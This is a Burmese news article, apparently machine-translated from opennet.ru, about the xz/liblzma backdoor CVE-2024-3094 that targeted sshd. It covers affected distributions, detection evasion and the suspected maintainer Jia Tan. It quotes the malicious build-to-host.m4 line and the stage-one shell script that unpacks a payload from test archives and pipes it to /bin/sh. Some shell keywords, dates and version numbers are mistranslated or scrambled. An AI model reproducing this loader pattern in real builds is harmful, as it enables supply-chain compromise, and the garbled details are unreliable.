sshd မှတဆင့်ဝင်ရောက်ခွင့်ပြုသော xz/liblzma စာကြည့်တိုက်တွင် backdoor ကိုရှာဖွေတွေ့ရှိခဲ့သည်။

".xz" ဖော်မတ်တွင် ချုံ့ထားသောဒေတာဖြင့် လုပ်ဆောင်ရန်အတွက် liblzma စာကြည့်တိုက်နှင့် utilities များပါ၀င်သည့် XZ Utils ပက်ကေ့ဂျ်တွင်၊ ဆက်စပ်အပလီကေးရှင်းများမှ ကြားဖြတ်လုပ်ဆောင်ပြီး ဒေတာများကို ပြုပြင်မွမ်းမံခြင်းအား ခွင့်ပြုသည့် backdoor (CVE-2024-3094) ကို ဖော်ထုတ်ခဲ့သည်။ liblzma စာကြည့်တိုက်နှင့်အတူ။ backdoor ၏ အဓိကပစ်မှတ်မှာ အချို့သော ဖြန့်ဝေမှုများတွင် libsystemd စာကြည့်တိုက်ဖြင့် ထုပ်ပိုးထားသည့် OpenSSH ဆာဗာဖြစ်သည်။ sshd ကို အားနည်းချက်ရှိသော စာကြည့်တိုက်တစ်ခုနှင့် ချိတ်ဆက်ခြင်းသည် တိုက်ခိုက်သူများအား စစ်မှန်ကြောင်းအထောက်အထားမရှိဘဲ SSH ဆာဗာသို့ ဝင်ရောက်ခွင့်ရရှိစေပါသည်။

Backdoor သည် ဖေဖော်ဝါရီလ 5.6.0 နှင့် မတ်လ 5.6.1 ရက်နေ့များတွင် ထုတ်ဝေခဲ့သော တရားဝင်ထွက်ရှိထားသော 24 နှင့် 9 တွင်ရှိနေပြီး၊ ဥပမာ၊ Gentoo၊ Arch Linux၊ Debian sid/unstable၊ Fedora Rawhide နှင့် Fedora Rawhide နှင့် 40-beta၊ openSUSE စက်ရုံနှင့် tumbleweed၊ LibreELEC၊ Alpine edge၊ Solus၊ NixOS မတည်မငြိမ်၊ OpenIndiana၊ OpenMandriva rolling၊ pkgsrc လက်ရှိ၊ Slackware လက်ရှိ၊ Manjaro စမ်းသပ်ခြင်း။ xz 5.6.0 နှင့် 5.6.1 ထုတ်ဝေမှုများကို အသုံးပြုသူအားလုံးကို ဗားရှင်း 5.4.6 သို့ အမြန်ပြန်တင်ရန် အကြံပြုထားသည်။

ပြဿနာကိုလျော့ပါးစေသည့်အချက်များထဲတွင်၊ backdoor ပါရှိသော liblzma ဗားရှင်းသည် ကြီးမားသောဖြန့်ဝေမှုများ၏တည်ငြိမ်သောဖြန့်ချိမှုများ၏တစ်စိတ်တစ်ပိုင်းဖြစ်လာစေရန်မစီမံနိုင်သော်လည်း openSUSE Tumbleweed နှင့် Fedora 40-beta တို့ကို ထိခိုက်စေခဲ့သည်ကို မှတ်သားနိုင်ပါသည်။ Arch Linux နှင့် Gentoo တို့သည် zx ၏ အားနည်းချက်ရှိသော ဗားရှင်းကို အသုံးပြုထားသော်လည်း ၎င်းတို့သည် openssh တွင် systemd-notify patch ကို အသုံးမပြုသောကြောင့် sshd ကို liblzma နှင့် ချိတ်ဆက်ထားသောကြောင့် တိုက်ခိုက်ခံရနိုင်ချေမရှိပါ။ Backdoor သည် Linux kernel နှင့် Glibc C စာကြည့်တိုက်တို့ကို အခြေခံသည့် x86_64 စနစ်များကိုသာ သက်ရောက်မှုရှိသည်။

အဆောက်အဦအတွင်း အော်တိုမက်တစ်ကိရိယာအစုံသုံးသော build-to-host.m4 ဖိုင်မှ နောက်ခံဖွင့်ခြင်းကုဒ်ကို m4 မက်ခရိုတွင် ဝှက်ထားသည်။ စုဝေးစဉ်အတွင်း၊ မော်ကွန်းတိုက်များ (bad-3-corrupt_lzma2.xz၊ good-large_compressed.lzma) ကို အခြေခံ၍ ရှုပ်ထွေးရှုပ်ထွေးသော လုပ်ဆောင်မှုများကို လုပ်ဆောင်နေစဉ်၊ လုပ်ဆောင်ချက်၏ မှန်ကန်မှုကို စမ်းသပ်ရန်အတွက် အသုံးပြုသည့် အရာဝတ္ထုဖိုင်ကို ထုတ်ပေးခဲ့ပြီး ၎င်းတွင် ထည့်သွင်းထားသည့်၊ liblzma စာကြည့်တိုက်နှင့် ၎င်း၏လုပ်ဆောင်ချက်အချို့ကို လုပ်ဆောင်ချက်လော့ဂျစ်ကို ပြောင်းလဲခဲ့သည်။ နောက်ခံ-အသက်ဝင်စေသော m4 မက်ခရိုများကို ထုတ်လွှတ်သည့် tarballs တွင် ပါ၀င်သော်လည်း Git repository တွင် မပါဝင်ပါ။ တစ်ချိန်တည်းမှာပင်၊ အန္တရာယ်ရှိသော စမ်းသပ်မှုမှတ်တမ်းများသည် သိုလှောင်ခန်းတွင် ရှိနေသည် ၊ ဆိုလိုသည်မှာ၊ Backdoor ကိုအကောင်အထည်ဖော်သူသည် repository နှင့် release generation process နှစ်ခုလုံးသို့ဝင်ရောက်ခွင့်ရှိသည်။

အပလီကေးရှင်းများတွင် liblzma ကိုအသုံးပြုသည့်အခါ၊ အန္တရာယ်ရှိသောပြောင်းလဲမှုများကို ဒေတာကို ကြားဖြတ် သို့မဟုတ် မွမ်းမံရန် သို့မဟုတ် sshd ၏လုပ်ဆောင်မှုကို ထိခိုက်နိုင်သည်။ အထူးသဖြင့်၊ အန္တရာယ်ရှိသောကုဒ်သည် sshd စစ်မှန်ကြောင်းအထောက်အထားပြခြင်းလုပ်ငန်းစဉ်ကို ကျော်လွှားရန် RSA_public_decrypt လုပ်ဆောင်ချက်ကို အတုအယောင်ပြုလုပ်ခဲ့သည်။ Backdoor တွင် ထောက်လှမ်းခြင်းမှ အကာအကွယ် ပါ၀င်ပြီး LANG နှင့် TERM ပတ်၀န်းကျင် ကိန်းရှင်များကို သတ်မှတ်သည့်အခါ (ဥပမာ၊ terminal တွင် လုပ်ငန်းစဉ်ကို လုပ်ဆောင်နေချိန်) နှင့် LD_DEBUG နှင့် LD_PROFILE ပတ်၀န်းကျင် ကိန်းရှင်များကို မသတ်မှတ်ထားဘဲ ၎င်းကို လုပ်ဆောင်သည့်အခါတွင်လည်း activated ဖြစ်ခဲ့ပါသည်။ /usr/sbin/sshd လည်ပတ်နိုင်သောဖိုင်။ Backdoor သည် အမှားရှာပြင်သည့် ပတ်ဝန်းကျင်များတွင် လုပ်ဆောင်မှုကို ထောက်လှမ်းနိုင်သည့် နည်းလမ်းလည်း ပါရှိသည်။

အထူးသဖြင့်၊ m4/build-to-host.m4 ဖိုင်သည် gl_am_configmake=`grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev/ ကို အသုံးပြုထားသည်။ null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

ပထမတည်ဆောက်မှုတွင်၊ grep လုပ်ဆောင်ချက်သည် ဖိုင် tests/files/bad-3-corrupt_lzma2.xz ကိုတွေ့ရှိခဲ့ပြီး၊ ထုပ်ပိုးပြီးသောအခါ၊ script ကိုထုတ်ပေးသည်- ####Hello#### #345U211267$^D330^W [ ! $(uname) = "Linux" ] && ထွက်ရန် 0 [ ! $(uname) = "Linux" ] && ထွက်ရန် 0 [ ! $(uname) = "Linux" ] && ထွက်ရန် 0 [ ! $(uname) = "Linux" ] && ထွက်ရန် 0 [ ! $(uname) = "Linux" ] && exit 0 eval `grep ^srcdir= config.status` စမ်းသပ်လျှင် -f ../../config.status;then eval `grep ^srcdir= ../../config .status` srcdir="../../$srcdir» fi ထုတ်ယူမှု i=»((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/ null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း - c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း - c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/ dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && ( ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ဦးခေါင်း -c +1024 >/dev/null) && ဦးခေါင်း -c +2048 && (ခေါင်း-c +1024 >/dev/null) && ဦးခေါင်း -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F အကြမ်း —lzma1 -dc|/bin/sh ####ကမ္ဘာ####

တိုက်ခိုက်သူများသည် xz ပရောဂျက်၏ အခြေခံအဆောက်အအုံကို မည်သို့ဝင်ရောက်ခွင့်ရအောင် စီမံခဲ့သည်ကို အပြည့်အစုံ မရှင်းလင်းသေးပါ။ Backdoor ကြောင့် သုံးစွဲသူများနှင့် ပရောဂျက်များ မည်မျှ အပေးအယူလုပ်ခဲ့သည်ကို ရှင်းရှင်းလင်းလင်း မသိရသေးပါ။ repository တွင် အန္တရာယ်ရှိသောကုဒ်များဖြင့် မော်ကွန်းတင်ထားသော backdoor (JiaT75 - Jia Tan) ၏ အစွပ်စွဲစာရေးဆရာသည် Fedora developer များနှင့် ဆက်သွယ်ခဲ့ပြီး xz 5.6.0 ဌာနခွဲသို့ ဖြန့်ချီမှုအကူးအပြောင်းနှင့်ပတ်သက်သည့် တောင်းဆိုချက်များအား Debian သို့ ပေးပို့ခဲ့ပြီး၊ xz တွင်ပါဝင်ခဲ့သည့်အတွက် သံသယစိတ်သည် လွန်ခဲ့သည့်နှစ်နှစ်ကတည်းက ဖွံ့ဖြိုးလာခဲ့ပြီး ပြောင်းလဲမှုအရေအတွက်အရ ဒုတိယ developer ဖြစ်လာခဲ့သည်။ xz ပရောဂျက်အပြင်၊ backdoor ၏ရေးသားသူသည် xz-java နှင့် xz-embedded packages များဖွံ့ဖြိုးတိုးတက်ရေးတွင်လည်း ပါဝင်ခဲ့သည်။ ထို့အပြင်၊ Jia Tan သည် လွန်ခဲ့သည့်ရက်အနည်းငယ်က Linux kernel တွင်အသုံးပြုသည့် XZ Embedded ပရောဂျက်၏ ထိန်းသိမ်းသူအရေအတွက်တွင် ပါဝင်ခဲ့သည်။

ssh မှတဆင့် Debian sid-based စနစ်များသို့ ချိတ်ဆက်သောအခါ valgrind မှထုတ်ပေးသော အမှားအယွင်းများကို ခွဲခြမ်းစိတ်ဖြာပြီးနောက် အန္တရာယ်ရှိသောပြောင်းလဲမှုကို ရှာဖွေတွေ့ရှိခဲ့သည်။ xz 5.6.1 ထုတ်ဝေမှုတွင် backdoor နှင့် zx 5.6.0 ဗားရှင်းသို့ အဆင့်မြှင့်တင်ပြီးနောက် ဖြစ်ပေါ်လာသော sshd နှေးကွေးမှုနှင့် ပျက်စီးမှုများအကြောင်း တိုင်ကြားချက်များကို တုံ့ပြန်သည့်အနေဖြင့် backdoor ၏ ရေးသားသူမှ ပြင်ဆင်ထားသော အပြောင်းအလဲများ ပါဝင်ကြောင်း မှတ်သားဖွယ်တွေ့ရှိရသည်။ ထို့အပြင် ယမန်နှစ်က Jia Tan သည် "-fsanitize=address" စစ်ဆေးရေးမုဒ်နှင့် ကိုက်ညီမှုမရှိသော အပြောင်းအလဲများကို ပြုလုပ်ခဲ့ပြီး fuzz စမ်းသပ်စဉ်အတွင်း ၎င်းအား ပိတ်ထားခဲ့ရသည်။

source: opennet.ru